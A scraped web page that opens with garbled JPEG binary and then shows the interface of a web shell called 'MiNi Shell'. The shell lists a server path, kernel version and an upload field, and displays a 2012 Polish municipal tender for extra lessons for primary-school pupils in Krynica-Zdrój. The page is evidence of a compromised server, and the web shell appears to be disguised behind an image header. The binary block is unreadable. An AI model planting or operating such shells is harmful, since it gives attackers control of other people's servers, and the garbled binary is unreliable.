JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121030/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121030/423782-N-2012.html

<p class="kh_header"><b>Krynica-Zdrój: Świadczenie usług edukacyjnych
polegających na organizacji i przeprowadzeniu dodatkowych zajęć edukacyjnych
dla uczniów klas I-III szkół podstawowych na terenie
Gminy Krynica - Zdrój w ramach realizacji projektu 
Lepszy start na dobry początek</b><br>
<b>Numer ogłoszenia: 423782 - 2012; data zamieszczenia: 30.10.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Obsługi Szkół i Przedszkoli , ul. Józefa Ignacego Kraszewskiego 7, 33-380 Krynica-Zdrój, woj. małopolskie, tel. 18 4725508, faks 18 4725502.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.krynica-zdroj.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka organizacyjna Gminy Krynica-Zdrój.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług edukacyjnych
polegających na organizacji i przeprowadzeniu dodatkowych zajęć edukacyjnych
dla uczniów klas I-III szkół podstawowych na terenie
Gminy Krynica - Zdrój w ramach realizacji projektu 
Lepszy start na dobry początek.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest świadczenie usług edukacyjnych polegających na organizacji i przeprowadzeniu dodatkowych zajęć edukacyjnych dla uczniów w klasach I - III szkół podstawowych na terenie Gminy Krynica - Zdrój w ramach realizacji projektu Lepszy start na dobry początek współfinansowanego przez Unię Europejską w ramach Programu Operacyjnego Kapitał Ludzki - Działanie 9.1. Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty, Poddziałanie 9.1.2 Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszanie różnic w jakości usług edukacyjnych.
2.	Zajęcia prowadzone będą w następujących szkołach podstawowych:
a)	Szkoła Podstawowa w Bereście, Berest 20, 33-380 Krynica-Zdrój;
b)	Szkoła Podstawowa w Tyliczu, ul. Kazimierza Wielkiego 9, 33-383 Tylicz;
c)	Szkoła Podstawowa Nr 1 w Krynicy-Zdroju, ul. Piłsudskiego 91, 33-380 Krynica-Zdrój;
d)	Szkoła Podstawowa Nr 2 w Krynicy-Zdroju, ul. Kraszewskiego 158, 33-380 Krynica-Zdrój.
3.	Zajęcia realizowane będą w roku szkolnym 2012/2013 i 2013/2014, po godzinach lekcyjnych, w następującym zakresie:
1)	Szkoła Podstawowa w Bereście:
-	Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym zagrożonych ryzykiem dysleksji. Łączna liczba godzin: 90, w tym w roku 2012: 9 godzin, w roku 2013: 81 godzin. Liczba uczestników: 22 uczniów (3 grupy).
-	Zajęcia dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych, w tym także zagrożonych ryzykiem dyskalkuli. Łączna liczba godzin: 60, w tym w roku 2012: 6 godzin, w roku 2013: 54 godziny. Liczba uczestników: 16 uczniów (2 grupy).
2)	Szkoła Podstawowa w Tyliczu:
-	Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym także zagrożonych ryzykiem dysleksji. Łączna liczba godzin: 90, w tym w roku 2012: 9 godzin, w roku 2013: 81 godzin. Liczba uczestników: 15 uczniów (3 grupy).
-	Zajęcia logopedyczne dla dzieci z wadami wymowy. Łączna liczba godzin: 90, w tym w roku 2012: 9 godzin, w roku 2013: 81 godzin. Liczba uczestników: 12 uczniów (3 grupy).
-	Gimnastyka korekcyjna dla dzieci z wadami postawy. Łączna liczba godzin: 60, w tym w roku 2012: 6 godzin, w 2013: 54 godziny. Liczba uczestników: 10 uczniów (2 grupy).
-	Zajęcia rozwijające zainteresowania uczniów szczególnie uzdolnionych muzycznie. Łączna liczba godzin: 30, w tym w roku 2012: 3 godziny, w 2013: 27 godzin. Liczba uczestników: 8 uczniów (1 grupa).
-	Zajęcia rozwijające zainteresowania uczniów szczególnie uzdolnionych ze szczególnym uwzględnieniem nauk matematyczno-przyrodniczych. Łączna liczba godzin: 90, w tym w roku 2012: 9 godzin, w roku 2013: 81 godzin. Liczba uczestników 20 uczniów (3 grupy).
3)	Szkoła Podstawowa Nr 1 w Krynicy-Zdroju:
-	Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym także zagrożonych ryzykiem dysleksji. Łączna liczba godzin: 90, w tym w roku 2012: 9 godzin, w roku 2013: 81 godzin. Liczba uczestników: 15 uczniów (3 grupy).
-	Zajęcia logopedyczne dla dzieci z zaburzeniami rozwoju mowy. Łączna liczba godzin: 120, w tym w roku 2012: 12 godzin, w roku 2013: 108 godzin. Liczba uczestników: 16 uczniów (4 grupy).
-	Zajęcia gimnastyczne korekcyjne dla dzieci z wadami postawy. Łączna liczba godzin: 60, w tym w roku 2012: 6 godzin, w 2013: 54 godziny. Liczba uczestników: 10 uczniów (2 grupy).
-	Zajęcia rozwijające zainteresowania uczniów szczególnie uzdolnionych ze szczególnym uwzględnieniem nauk matematyczno-przyrodniczych. Łączna liczba godzin: 60, w tym w roku 2012: 6 godzin, w roku 2013: 54 godzin. Liczba uczestników 16 uczniów (2 grupy).
4)	Szkoła Podstawowa Nr 2 w Krynicy-Zdroju:
-	Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym także zagrożonych ryzykiem dysleksji. Łączna liczba godzin: 180, w tym w roku 2012: 45 godzin, w roku 2013: 135 godzin. Liczba uczestników: 15 uczniów (3 grupy).
-	Zajęcia dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych. Łączna liczba godzin: 180, w tym w roku 2012: 45 godzin, w roku 2013: 135 godziny. Liczba uczestników: 12 uczniów (3 grupy).
-	Zaburzenia rozwoju mowy - zajęcia logopedyczne. Łączna liczba godzin: 180, w tym w roku 2012: 60 godzin, w roku 2013: 120 godziny. Liczba uczestników: 16 uczniów (4 grupy).
-	Zajęcia rozwijające zainteresowania uczniów szczególnie uzdolnionych ze szczególnym uwzględnieniem nauk matematyczno-przyrodniczych. Łączna liczba godzin: 180, w tym w roku 2012: 60 godzin, w roku 2013: 120 godzin. Liczba uczestników: 28 uczniów (4 grupy).
-	Gimnastyka korekcyjna dla dzieci z wadami postawy. Łączna liczba godzin: 196, w tym w roku 2012: 90 godzin, w roku 2013: 106 godzin. Liczba uczestników: 24 uczniów (6 grup).
4.	Jeden uczestnik projektu (uczeń) może brać udział w więcej niż 1 rodzaju zajęć.
5.	Pod pojęciem godziny należy rozumieć 45 lub 60 minut, w zależności od rodzaju zajęć, zgodnie z zapisami Rozporządzenia Ministra Edukacji Narodowej z dnia 17 listopada 2010 r. w sprawie zasad udzielania i organizacji pomocy psychologicznej w publicznych przedszkolach, szkołach i placówkach (Dz. U. z 2010 r. Nr 228, poz. 1487 z późn. zm.). I tak:
a)	zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu w tym zagrożonych ryzykiem dysleksji - 45 minut,
b)	zajęcia dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych - 45 minut,
c)	zajęcia logopedyczne dla dzieci z zaburzeniami rozwoju mowy - 60 minut,
d)	zajęcia dla dzieci ze szczególnymi uzdolnieniami matematyczno-przyrodniczymi - 45 minut,
e)	gimnastyka korekcyjna - 45 minut,
f)	zajęcia dla dzieci szczególnie uzdolnionych muzycznie - 45 minut.
6.	Zamawiający zapewni bezpłatny dostęp do sal, w których prowadzone będą zajęcia w szkołach biorących udział w projekcie.
7.	Osoby prowadzące poszczególne zajęcia sporządzą testy oraz ankiety ewaluacyjne sprawdzające wiedzę każdego uczestnika na początku oraz na końcu przeprowadzonych zajęć, a następnie Wykonawca dokona analizy danych otrzymanych od prowadzących zajęcia, sporządzi opracowanie zbiorcze według wytycznych przekazanych przez Zamawiającego. Dokument ten Wykonawca przekaże Zamawiającemu w terminie do 14 lipca 2013 r. (podsumowanie dotyczy badania rezultatów zajęć w roku szkolnym 2012/2013) oraz do 14.12.2013 r. (podsumowanie dotyczące badania rezultatów zajęć w roku szkolnym 2013/2014 wraz ze zbiorczym podsumowaniem dotyczącym badania rezultatów zrealizowanych zajęć dydaktycznych w całym okresie obowiązywania umowy). Wykonawca zapewni jednolitość narzędzi pomiaru wskaźników dla tego samego rodzaju zajęć prowadzonych w poszczególnych szkołach dla roku szkolnego 2012/2013 i 2013/2014.
8.	Harmonogram realizacji poszczególnych zajęć Wykonawca opracuje we współpracy z dyrektorami szkół biorących udział w projekcie, uwzględniając podział zajęć dla każdej szkoły oraz plan lekcji beneficjentów ostatecznych. Harmonogram zajęć będzie musiał być dostosowany do harmonogramu wynikającego z wniosku o dofinansowanie oraz z potrzeb Zamawiającego.
9.	Wykonawca będzie zobowiązany opracować Regulamin realizacji zajęć dydaktycznych i dostarczyć go Zamawiającemu do akceptacji w terminie do 5 dni od daty podpisania umowy. Regulamin będzie zawierał program szkoleń, harmonogram, o którym mowa w pkt 8 oraz zapisy określające dopuszczalną liczbę nieusprawiedliwionych godzin nieobecności na zajęciach, jak również procedury postępowania w przypadku wycofania się ucznia z udziału w zajęciach (przed rozpoczęciem, bądź w ich trakcie), powtarzającej się nieobecności ucznia na zajęciach, (gdy liczba nieusprawiedliwionych godzin przekracza dopuszczalną ilość), rażącego naruszenia zasad uczestnictwa w zajęciach, skreślenia uczestnika z listy uczniów szkoły objętej wsparciem w ramach projektu, samodzielnej rezygnacji uczestnika podpisanej przez rodzica / prawnego opiekuna. Regulamin będzie ponadto określał procedurę zastępowania ucznia w razie jego rezygnacji bądź skreślenia z listy uczestników projektu, uczniem wskazanym przez dyrektora szkoły spełniającym kryteria uczestnictwa w projekcie.
10.	Przed rozpoczęciem zajęć edukacyjnych Wykonawca otrzyma od dyrektorów poszczególnych szkół objętych projektem, listy uczniów zakwalifikowanych do udziału w projekcie (Beneficjentów Ostatecznych), z podziałem na grupy w ramach każdego rodzaju zajęć. Liczba osób w grupie dla poszczególnych rodzajów zajęć będzie zgodna z wytycznymi określonymi w Rozporządzeniu Ministra Edukacji Narodowej z dnia 17 listopada 2010 r. w sprawie zasad udzielania i organizacji pomocy psychologicznej w publicznych przedszkolach, szkołach i placówkach oraz z zapisami wniosku o dofinansowanie projektu.
11.	Wykonawca będzie przekazywał następujące dokumenty dotyczące realizacji zajęć:
a)	miesięczne sprawozdania z realizacji godzin w poszczególnych grupach zawierające analizę frekwencji uczestników na zajęciach (w terminie do 5 dnia następnego miesiąca),
b)	imienny wykaz osób, które brały udział w zajęciach (po skończonym miesiącu w terminie do 5 dnia następnego miesiąca),
c)	imienny wykaz osób, które zrezygnowały z udziału w zajęciach bądź zostały skreślone z listy uczestników z określeniem przyczyn takiego stanu rzeczy (po skończonym miesiącu w terminie do 5 dnia następnego miesiąca),
d)	rejestr wydanych zaświadczeń lub innych dokumentów potwierdzających ukończenie zajęć do 14 lipca 2013 roku dla uczniów uczestniczących w zajęciach w roku szkolnym 2012/2013 oraz do 14 grudnia 2013 r. dla uczniów uczestniczących w zajęciach w roku szkolnym 2013/2014,
e)	dzienniki zajęć z listą obecności (po skończonym miesiącu w terminie do 5 dnia następnego miesiąca),
f)	zbiorcze opracowanie wyników badania rezultatów projektu do 14 lipca 2013 r. (podsumowanie dotyczące badania rezultatów zajęć zrealizowanych w roku szkolnym 2012/2013) oraz do 14 grudnia 2013 (podsumowanie dotyczące badania rezultatów zajęć zrealizowanych w roku szkolnym 2013/2014 oraz zbiorcze podsumowanie dotyczące badania rezultatów zrealizowanych zajęć dydaktycznych w całym okresie obowiązywania umowy).
12.	Wykonawca będzie zobowiązany do prowadzenia zajęć metodami aktywizującymi, z wykorzystaniem zakupionych w ramach projektu pomocy i materiałów dydaktycznych - od momentu ich dostarczenia przez Zamawiającego.
13.	Wykonawca umożliwi Zamawiającemu wizytowanie w trakcie zajęć.
14.	Wykonawca będzie zobowiązany do wydania uczestnikom projektu zaświadczeń o udziale w danych zajęciach, na zakończenie zajęć..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.10.00.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda od Wykonawców wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli Wykonawca wykaże, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie należycie wykonał co najmniej jedną usługę polegającą na organizacji i przeprowadzeniu zajęć edukacyjnych lub szkoleniowych o wartości co najmniej 40 000,00 zł brutto.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli Wykonawca wykaże, że dysponuje osobami, które będą uczestniczyć w wykonywaniu zamówienia:
1. - co najmniej 4 osobami posiadającymi ukończone studia wyższe minimum licencjackie lub magisterskie z przygotowaniem pedagogicznym w zakresie edukacji wczesnoszkolnej lub kształcenia zintegrowanego będącymi jednocześnie czynnymi zawodowo nauczycielami, lub 
- co najmniej 4 osobami posiadającymi ukończone studia wyższe minimum licencjackie lub magisterskie z przygotowaniem pedagogicznym i ukończone studia podyplomowe lub kurs kwalifikacyjny z zakresu edukacji wszesnoszkolenj lub kształcenia zintegrowanego będącymi jednocześnie czynnymi zawodowo nauczycielami, lub
- co najmniej 4 osobami posiadającymi kwalifikacje nabyte w zakresie edukacji wczesnoszkolnej lub kształcenia zintegrowanego będącymi jednocześnie czynnymi zawodowo nauczycielami, lub
- co najmniej 4 osobami mającymi ukończone studia wyższe minimum licencjackie lub magisterskie z przygotowaniem pedagogicznym i posiadające kwalifikacje do nauki w szkole podstawowej oraz w zakresie terapii pedagogicznej będącymi jednocześnie czynnymi zawodowo nauczycielami.
2. - co najmniej 3 osobami posiadającymi ukończone studia wyższe minimum licencjackie lub magisterskie z logopedii z przygotowaniem pedagogicznym będącymi jednocześnie czynnymi nauczycielami lub logopedami, lub
- co najmniej 3 osobami posiadającymi ukończone studia wyższe minimum licencjackie lub magisterskie z przygotowaniem pedagogicznym i ukończone studia podyplomowe z zakresu logopedii będącymi jednocześnie czynnymi nauczycielami lub logopedami.
3. - co najmniej 3 osobami posiadającymi ukończone studia wyższe minimum licencjackie lub magisterskie z przygotowaniem pedagogicznym w zakresie wychowania fizycznego z kwalifikacjami do prowadzenia gimnastyki korekcyjnej będącymi jednocześnie czynnymi nauczycielami, lub
- co najmniej 3 osobami posiadającymi ukończone studia wyższe minimum licencjackie lub magisterskie z przygotowaniem pedagogicznym i ukończony kurs kwalifikacyjny z zakresu gimnastyki korekcyjnej lub ukończone studia podyplomowe z zakresu gimnastyki korekcyjnej będącymi jednocześnie czynnymi nauczycielami.

Ta sama osoba nie może prowadzić zajęć w kilku szkołach tj. dwóch lub więcej z uwagi na fakt, że zajęcia w każdej ze szkół rozpoczynają się przeważnie w tym samym dniu i o tej samej godzinie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Istotne zmiany treści umowy mogą wynikać z następujących okoliczności:
a) zmiany przepisów prawnych obowiązujących w dniu podpisania umowy, w tym przepisów
regulujących wysokości stawki VAT;
b) sytuacji niezależnych od stron umowy lub w przypadku działania siły wyższej, powodującej
konieczność wprowadzenia zmian do umowy. Przez działanie siły wyższej należy rozumieć
zdarzenie bądź połączenie zdarzeń obiektywnie niezależnych od stron umowy, które zasadniczo
i istotnie utrudniają wykonywanie części lub całości zobowiązań wynikających z umowy,
których strony umowy nie mogły przewidzieć i którym nie mogły zapobiec, ani ich
przezwyciężyć i im przeciwdziałać poprzez działanie z należytą starannością ogólnie przewidzianą dla cywilnoprawnych stosunków zobowiązaniowych. Wykonawca jest
zobowiązany niezwłocznie poinformować Zamawiającego o fakcie zaistnienia siły wyższej</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.krynica-zdroj.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zespół Obsługi Szkół i Przedszkoli w Krynicy-Zdroju,
ul. Kraszewskiego 7,
33-380 Krynica - Zdrój.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.11.2012 godzina 10:00, miejsce: Zespół Obsługi Szkół i Przedszkoli w Krynicy-Zdroju,
ul. Kraszewskiego 7,
33-380 Krynica - Zdrój,
pokój nr 5.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt Lepszy start na dobry początek jest współfinansowany przez
Unię Europejską w ramach Programu Operacyjnego Kapitał Ludzki - Działanie 9.1. Wyrównywanie
szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie
oświaty, Poddziałanie 9.1.2 Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym
dostępie do edukacji oraz zmniejszanie różnic w jakości usług edukacyjnych.
Zamawiający nie przewiduje zawarcia umowy ramowej..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com